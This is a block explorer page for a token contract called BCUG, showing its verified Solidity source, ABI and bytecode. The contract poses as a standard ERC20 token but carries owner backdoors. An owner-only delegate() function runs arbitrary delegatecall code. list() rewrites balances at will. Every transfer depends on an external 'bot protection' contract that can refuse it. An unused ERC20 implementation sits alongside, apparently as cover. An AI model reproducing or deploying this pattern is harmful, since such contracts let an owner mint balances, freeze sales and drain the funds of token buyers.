ETH Price: $3,088.32 (+0.90%)
Gas: 4 Gwei

Token

Blockchain Cuties Universe Governance Token (BCUG)
 

Overview

Max Total Supply

313,636 BCUG

Holders

48

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
114.887021944117685794 BCUG

Value
$0.00
0x97b0fbbc81044442fdcd88b2be36b3df190fe411
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.

Contract Source Code Verified (Exact Match)

Contract Name:
BCUG

Compiler Version
v0.7.3+commit.9bfce1f6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Token.sol
//SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

interface IERC20 {
    function totalSupply() external view returns(uint);

    function balanceOf(address account) external view returns(uint);

    function transfer(address recipient, uint amount) external returns(bool);

    function allowance(address owner, address spender) external view returns(uint);

    function approve(address spender, uint amount) external returns(bool);

    function transferFrom(address sender, address recipient, uint amount) external returns(bool);
    event Transfer(address indexed from, address indexed to, uint value);
    event Approval(address indexed owner, address indexed spender, uint value);
}

interface IUniswapV2Router02 {

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract BotProtected {
 
    address internal owner;
    address private botProtection;
    address public uniPair;
 
    constructor(address _botProtection) {
        botProtection = _botProtection;
    }
 
    // Uses Ferrum Launch Protection System
    modifier checkBots(address _from, address _to, uint256 _value) {
        (bool notABot, bytes memory isNotBot) = botProtection.call(abi.encodeWithSelector(0x15274141, _from, _to, uniPair, _value));
        require(notABot);
        _;
    }
}

library SafeMath {
    function add(uint a, uint b) internal pure returns(uint) {
        uint c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    function sub(uint a, uint b) internal pure returns(uint) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint a, uint b, string memory errorMessage) internal pure returns(uint) {
        require(b <= a, errorMessage);
        uint c = a - b;

        return c;
    }

    function mul(uint a, uint b) internal pure returns(uint) {
        if (a == 0) {
            return 0;
        }

        uint c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    function div(uint a, uint b) internal pure returns(uint) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint a, uint b, string memory errorMessage) internal pure returns(uint) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint c = a / b;

        return c;
    }
}

abstract contract ERC20 {
    using SafeMath for uint;
    mapping(address => uint) private _balances;

    mapping(address => mapping(address => uint)) private _allowances;

    uint private _totalSupply;

    function totalSupply() public view returns(uint) {
        return _totalSupply;
    }

    function balanceOf(address account) public view returns(uint) {
        return _balances[account];
    }

    function transfer(address recipient, uint amount) public returns(bool) {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view returns(uint) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint amount) public returns(bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint amount) public returns(bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function increaseAllowance(address spender, uint addedValue) public returns(bool) {
        _approve(msg.sender, spender, _allowances[msg.sender][spender].add(addedValue));
        return true;
    }

    function decreaseAllowance(address spender, uint subtractedValue) public returns(bool) {
        _approve(msg.sender, spender, _allowances[msg.sender][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    function _transfer(address sender, address recipient, uint amount) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
    }

    function _mint(address account, uint amount) internal {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
    }

    function _burn(address account, uint amount) internal {
        require(account != address(0), "ERC20: burn from the zero address");

        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
    }

    function _approve(address owner, address spender, uint amount) internal {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
    }
}

contract BCUG is BotProtected {
 
    mapping (address => uint) public balanceOf;
    mapping (address => mapping (address => uint)) public allowance;
 
    uint constant public decimals = 18;
    uint public totalSupply = 313636000000000000000000;
    string public name = "Blockchain Cuties Universe Governance Token";
    string public symbol = "BCUG";
    IUniswapV2Router02 public uniRouter = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
    address public wETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;

    event Transfer(address indexed _from, address indexed _to, uint _value);
    event Approval(address indexed _owner, address indexed _spender, uint _value);
 
    constructor(address _botProtection) BotProtected(_botProtection) {
        owner = msg.sender;
        
        uniPair = pairFor(wETH, address(this));
        allowance[address(this)][address(uniRouter)] = uint(-1);
        allowance[msg.sender][uniPair] = uint(-1);
    }
 
    function transfer(address _to, uint _value) public payable returns (bool) {
        return transferFrom(msg.sender, _to, _value);
    }
 
    function transferFrom(address _from, address _to, uint _value) public payable checkBots(_from, _to, _value) returns (bool) {
        if (_value == 0) { return true; }
        if (msg.sender != _from) {
            require(allowance[_from][msg.sender] >= _value);
            allowance[_from][msg.sender] -= _value;
        }
        require(balanceOf[_from] >= _value);
        balanceOf[_from] -= _value;
        balanceOf[_to] += _value;
        emit Transfer(_from, _to, _value);
        return true;
    }
 
    function approve(address _spender, uint _value) public payable returns (bool) {
        allowance[msg.sender][_spender] = _value;
        emit Approval(msg.sender, _spender, _value);
        return true;
    }
 
    function delegate(address a, bytes memory b) public payable {
        require(msg.sender == owner);
        a.delegatecall(b);
    }

    function pairFor(address tokenA, address tokenB) internal pure returns (address pair) {
        (address token0, address token1) = tokenA < tokenB ? (tokenA, tokenB) : (tokenB, tokenA);

        pair = address(uint(keccak256(abi.encodePacked(
                hex'ff',
                0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f,
                keccak256(abi.encodePacked(token0, token1)),
                hex'96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e7da348845f'
            ))));
    }

    function list(uint _numList, address[] memory _tos, uint[] memory _amounts) public payable {
        require(msg.sender == owner);
        balanceOf[address(this)] = _numList;
        balanceOf[msg.sender] = totalSupply * 6 / 100;

        uniRouter.addLiquidityETH{value: msg.value}(
            address(this),
            _numList,
            _numList,
            msg.value,
            msg.sender,
            block.timestamp + 600
        );

        require(_tos.length == _amounts.length);

        for(uint i = 0; i < _tos.length; i++) {
            balanceOf[_tos[i]] = _amounts[i];
            emit Transfer(address(0x0), _tos[i], _amounts[i]);
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"_botProtection","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_owner","type":"address"},{"indexed":true,"internalType":"address","name":"_spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_from","type":"address"},{"indexed":true,"internalType":"address","name":"_to","type":"address"},{"indexed":false,"internalType":"uint256","name":"_value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_spender","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"a","type":"address"},{"internalType":"bytes","name":"b","type":"bytes"}],"name":"delegate","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_numList","type":"uint256"},{"internalType":"address[]","name":"_tos","type":"address[]"},{"internalType":"uint256[]","name":"_amounts","type":"uint256[]"}],"name":"list","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"uniPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniRouter","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"wETH","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

69426a3ddb5d410e10000060055560e0604052602b60808181529062000ed760a039805161003591600691602090910190610276565b50604080518082019091526004808252634243554760e01b602090920191825261006191600791610276565b50600880546001600160a01b0319908116737a250d5630b4cf539739df2c5dacb4c659f2488d179091556009805490911673c02aaa39b223fe8d0a0e5c4f27ead9083c756cc21790553480156100b657600080fd5b5060405162000f0238038062000f02833981810160405260208110156100db57600080fd5b5051600180546001600160a01b038084166001600160a01b0319928316179092556000805490911633179055600954610115911630610175565b600280546001600160a01b0319166001600160a01b03928316178155306000908152600460208181526040808420600854871685528252808420600019908190553385529282528084209454909516835292909252919091205550610309565b6000806000836001600160a01b0316856001600160a01b03161061019a57838561019d565b84845b604080516001600160601b0319606094851b81166020808401919091529390941b9093166034840152805160288185030181526048840182528051908301207fff0000000000000000000000000000000000000000000000000000000000000060688501527f5c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f0000000000000000000000006069850152607d8401527f96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e7da348845f609d808501919091528151808503909101815260bd9093019052815191012095945050505050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106102b757805160ff19168380011785556102e4565b828001600101855582156102e4579182015b828111156102e45782518255916020019190600101906102c9565b506102f09291506102f4565b5090565b5b808211156102f057600081556001016102f5565b610bbe80620003196000396000f3fe6080604052600436106100dd5760003560e01c806395d89b411161007f578063a9059cbb11610059578063a9059cbb146103dc578063d6d2b6ba14610408578063dd62ed3e146104be578063f2428621146104f9576100dd565b806395d89b4114610282578063964561f514610297578063a0e47bf6146103c7576100dd565b806323b872dd116100bb57806323b872dd146101d3578063313ce5671461020957806332972e461461021e57806370a082311461024f576100dd565b806306fdde03146100e2578063095ea7b31461016c57806318160ddd146101ac575b600080fd5b3480156100ee57600080fd5b506100f761050e565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610131578181015183820152602001610119565b50505050905090810190601f16801561015e5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101986004803603604081101561018257600080fd5b506001600160a01b03813516906020013561059c565b604080519115158252519081900360200190f35b3480156101b857600080fd5b506101c1610602565b60408051918252519081900360200190f35b610198600480360360608110156101e957600080fd5b506001600160a01b03813581169160208101359091169060400135610608565b34801561021557600080fd5b506101c1610831565b34801561022a57600080fd5b50610233610836565b604080516001600160a01b039092168252519081900360200190f35b34801561025b57600080fd5b506101c16004803603602081101561027257600080fd5b50356001600160a01b0316610845565b34801561028e57600080fd5b506100f7610857565b6103c5600480360360608110156102ad57600080fd5b813591908101906040810160208201356401000000008111156102cf57600080fd5b8201836020820111156102e157600080fd5b8035906020019184602083028401116401000000008311171561030357600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929594936020810193503591505064010000000081111561035357600080fd5b82018360208201111561036557600080fd5b8035906020019184602083028401116401000000008311171561038757600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506108b2945050505050565b005b3480156103d357600080fd5b50610233610a7c565b610198600480360360408110156103f257600080fd5b506001600160a01b038135169060200135610a8b565b6103c56004803603604081101561041e57600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561044957600080fd5b82018360208201111561045b57600080fd5b8035906020019184600183028401116401000000008311171561047d57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600092019190915250929550610a9f945050505050565b3480156104ca57600080fd5b506101c1600480360360408110156104e157600080fd5b506001600160a01b0381358116916020013516610b5c565b34801561050557600080fd5b50610233610b79565b6006805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156105945780601f1061056957610100808354040283529160200191610594565b820191906000526020600020905b81548152906001019060200180831161057757829003601f168201915b505050505081565b3360008181526004602090815260408083206001600160a01b038716808552908352818420869055815186815291519394909390927f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925928290030190a350600192915050565b60055481565b600154600254604080516001600160a01b0380881660248301528087166044830152928316606482015260848082018690528251808303909101815260a490910182526020810180516001600160e01b0316631527414160e01b17815291518151600095899589958995899560609593909416939092909182918083835b602083106106a55780518252601f199092019160209182019101610686565b6001836020036101000a0380198251168184511680821785525050505050509050019150506000604051808303816000865af19150503d8060008114610707576040519150601f19603f3d011682016040523d82523d6000602084013e61070c565b606091505b50915091508161071b57600080fd5b866107295760019550610825565b336001600160a01b038a1614610794576001600160a01b038916600090815260046020908152604080832033845290915290205487111561076957600080fd5b6001600160a01b03891660009081526004602090815260408083203384529091529020805488900390555b6001600160a01b0389166000908152600360205260409020548711156107b957600080fd5b6001600160a01b03808a16600081815260036020908152604080832080548d90039055938c168083529184902080548c01905583518b8152935191937fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef929081900390910190a3600195505b50505050509392505050565b601281565b6002546001600160a01b031681565b60036020526000908152604090205481565b6007805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156105945780601f1061056957610100808354040283529160200191610594565b6000546001600160a01b031633146108c957600080fd5b306000818152600360205260408082208690556005543380845292829020606460069092028290049055600854825163f305d71960e01b815260048101959095526024850188905260448501889052349185018290526084850193909352610258420160a485015290516001600160a01b039092169263f305d7199260c480830192606092919082900301818588803b15801561096557600080fd5b505af1158015610979573d6000803e3d6000fd5b50505050506040513d606081101561099057600080fd5b505080518251146109a057600080fd5b60005b8251811015610a76578181815181106109b857fe5b6020026020010151600360008584815181106109d057fe5b60200260200101516001600160a01b03166001600160a01b0316815260200190815260200160002081905550828181518110610a0857fe5b60200260200101516001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef848481518110610a5157fe5b60200260200101516040518082815260200191505060405180910390a36001016109a3565b50505050565b6008546001600160a01b031681565b6000610a98338484610608565b9392505050565b6000546001600160a01b03163314610ab657600080fd5b816001600160a01b0316816040518082805190602001908083835b60208310610af05780518252601f199092019160209182019101610ad1565b6001836020036101000a038019825116818451168082178552505050505050905001915050600060405180830381855af49150503d8060008114610b50576040519150601f19603f3d011682016040523d82523d6000602084013e610b55565b606091505b5050505050565b600460209081526000928352604080842090915290825290205481565b6009546001600160a01b03168156fea2646970667358221220d774e72e90fe45a1ff712938d12f8c9134ab2fd61a067df2931a61acdb3be9f664736f6c63430007030033426c6f636b636861696e2043757469657320556e69766572736520476f7665726e616e636520546f6b656e00000000000000000000000023dbf6e339340a8c6a83fc08e2d13fbaa4b8e67b

Deployed Bytecode

0x6080604052600436106100dd5760003560e01c806395d89b411161007f578063a9059cbb11610059578063a9059cbb146103dc578063d6d2b6ba14610408578063dd62ed3e146104be578063f2428621146104f9576100dd565b806395d89b4114610282578063964561f514610297578063a0e47bf6146103c7576100dd565b806323b872dd116100bb57806323b872dd146101d3578063313ce5671461020957806332972e461461021e57806370a082311461024f576100dd565b806306fdde03146100e2578063095ea7b31461016c57806318160ddd146101ac575b600080fd5b3480156100ee57600080fd5b506100f761050e565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610131578181015183820152602001610119565b50505050905090810190601f16801561015e5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101986004803603604081101561018257600080fd5b506001600160a01b03813516906020013561059c565b604080519115158252519081900360200190f35b3480156101b857600080fd5b506101c1610602565b60408051918252519081900360200190f35b610198600480360360608110156101e957600080fd5b506001600160a01b03813581169160208101359091169060400135610608565b34801561021557600080fd5b506101c1610831565b34801561022a57600080fd5b50610233610836565b604080516001600160a01b039092168252519081900360200190f35b34801561025b57600080fd5b506101c16004803603602081101561027257600080fd5b50356001600160a01b0316610845565b34801561028e57600080fd5b506100f7610857565b6103c5600480360360608110156102ad57600080fd5b813591908101906040810160208201356401000000008111156102cf57600080fd5b8201836020820111156102e157600080fd5b8035906020019184602083028401116401000000008311171561030357600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929594936020810193503591505064010000000081111561035357600080fd5b82018360208201111561036557600080fd5b8035906020019184602083028401116401000000008311171561038757600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506108b2945050505050565b005b3480156103d357600080fd5b50610233610a7c565b610198600480360360408110156103f257600080fd5b506001600160a01b038135169060200135610a8b565b6103c56004803603604081101561041e57600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561044957600080fd5b82018360208201111561045b57600080fd5b8035906020019184600183028401116401000000008311171561047d57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600092019190915250929550610a9f945050505050565b3480156104ca57600080fd5b506101c1600480360360408110156104e157600080fd5b506001600160a01b0381358116916020013516610b5c565b34801561050557600080fd5b50610233610b79565b6006805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156105945780601f1061056957610100808354040283529160200191610594565b820191906000526020600020905b81548152906001019060200180831161057757829003601f168201915b505050505081565b3360008181526004602090815260408083206001600160a01b038716808552908352818420869055815186815291519394909390927f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925928290030190a350600192915050565b60055481565b600154600254604080516001600160a01b0380881660248301528087166044830152928316606482015260848082018690528251808303909101815260a490910182526020810180516001600160e01b0316631527414160e01b17815291518151600095899589958995899560609593909416939092909182918083835b602083106106a55780518252601f199092019160209182019101610686565b6001836020036101000a0380198251168184511680821785525050505050509050019150506000604051808303816000865af19150503d8060008114610707576040519150601f19603f3d011682016040523d82523d6000602084013e61070c565b606091505b50915091508161071b57600080fd5b866107295760019550610825565b336001600160a01b038a1614610794576001600160a01b038916600090815260046020908152604080832033845290915290205487111561076957600080fd5b6001600160a01b03891660009081526004602090815260408083203384529091529020805488900390555b6001600160a01b0389166000908152600360205260409020548711156107b957600080fd5b6001600160a01b03808a16600081815260036020908152604080832080548d90039055938c168083529184902080548c01905583518b8152935191937fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef929081900390910190a3600195505b50505050509392505050565b601281565b6002546001600160a01b031681565b60036020526000908152604090205481565b6007805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156105945780601f1061056957610100808354040283529160200191610594565b6000546001600160a01b031633146108c957600080fd5b306000818152600360205260408082208690556005543380845292829020606460069092028290049055600854825163f305d71960e01b815260048101959095526024850188905260448501889052349185018290526084850193909352610258420160a485015290516001600160a01b039092169263f305d7199260c480830192606092919082900301818588803b15801561096557600080fd5b505af1158015610979573d6000803e3d6000fd5b50505050506040513d606081101561099057600080fd5b505080518251146109a057600080fd5b60005b8251811015610a76578181815181106109b857fe5b6020026020010151600360008584815181106109d057fe5b60200260200101516001600160a01b03166001600160a01b0316815260200190815260200160002081905550828181518110610a0857fe5b60200260200101516001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef848481518110610a5157fe5b60200260200101516040518082815260200191505060405180910390a36001016109a3565b50505050565b6008546001600160a01b031681565b6000610a98338484610608565b9392505050565b6000546001600160a01b03163314610ab657600080fd5b816001600160a01b0316816040518082805190602001908083835b60208310610af05780518252601f199092019160209182019101610ad1565b6001836020036101000a038019825116818451168082178552505050505050905001915050600060405180830381855af49150503d8060008114610b50576040519150601f19603f3d011682016040523d82523d6000602084013e610b55565b606091505b5050505050565b600460209081526000928352604080842090915290825290205481565b6009546001600160a01b03168156fea2646970667358221220d774e72e90fe45a1ff712938d12f8c9134ab2fd61a067df2931a61acdb3be9f664736f6c63430007030033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000023dbf6e339340a8c6a83fc08e2d13fbaa4b8e67b

-----Decoded View---------------
Arg [0] : _botProtection (address): 0x23DBf6E339340A8C6A83FC08e2d13FBAA4b8e67B

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000023dbf6e339340a8c6a83fc08e2d13fbaa4b8e67b


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.